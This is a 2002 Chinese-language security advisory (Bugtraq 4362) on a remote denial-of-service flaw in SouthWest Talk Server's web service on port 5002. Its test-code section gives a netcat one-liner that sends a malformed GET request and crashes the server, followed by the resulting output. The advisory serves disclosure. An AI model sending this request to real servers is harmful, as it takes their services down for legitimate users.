SouthWest Talk Server存在拒绝服务攻击

发布时间：2002-03-29
更新时间：2002-03-29
严重程度：中
威胁程度：远程拒绝服务
错误类型：意外情况处置错误
利用方式：服务器模式

BUGTRAQ ID：4362

受影响系统

SouthWest SouthWest 1.0.0
   - Microsoft Windows 95 0.0
   - Microsoft Windows 98 0.0
   - Microsoft Windows NT Workstation 4.0
   - Microsoft Windows NT Workstation 4.0SP1
   - Microsoft Windows NT Workstation 4.0SP2
   - Microsoft Windows NT Workstation 4.0SP3
   - Microsoft Windows NT Workstation 4.0SP4
   - Microsoft Windows NT Workstation 4.0SP5
   - Microsoft Windows NT Workstation 4.0SP6
   - Microsoft Windows NT Workstation 4.0SP6a

详细描述
SouthWest是一款WINDOWS下的语音聊天服务程序，由Scott Lloyd维护开发，其中包含一个WEB服务，默认端口为5002。

当远程用户通过HTTP请求任意WEB页面的时候，系统会崩溃，造成拒绝服务攻击。

测试代码
$ printf "GET /&Alex" |nc -vvn 127.0.0.1 5002
(UNKNOWN) [127.0.0.1] 5002 (?) open
sent 10, rcvd 0: NOTSOCK

$ nc -vvn 127.0.0.1 5002
(UNKNOWN) [127.0.0.1] 5002 (?): connection refused
sent 0, rcvd 0: NOTSOCK

$ nc -vvn 127.0.0.1 5000
(UNKNOWN) [127.0.0.1] 5000 (?): connection refused
sent 0, rcvd 0: NOTSOCK

$ nc -vvn 127.0.0.1 5001
(UNKNOWN) [127.0.0.1] 5000 (?): connection refused
sent 0, rcvd 0: NOTSOCK

解决方案
尚无

相关信息
Alex Hernandez <alex_hernandez@ureach.com>.
参考：http://online.securityfocus.com/archive/1/264168
相关主页：http://someplaceelse.dynip.com/southwest/

最近严重漏洞

SouthWest Talk Server存在拒绝服务攻击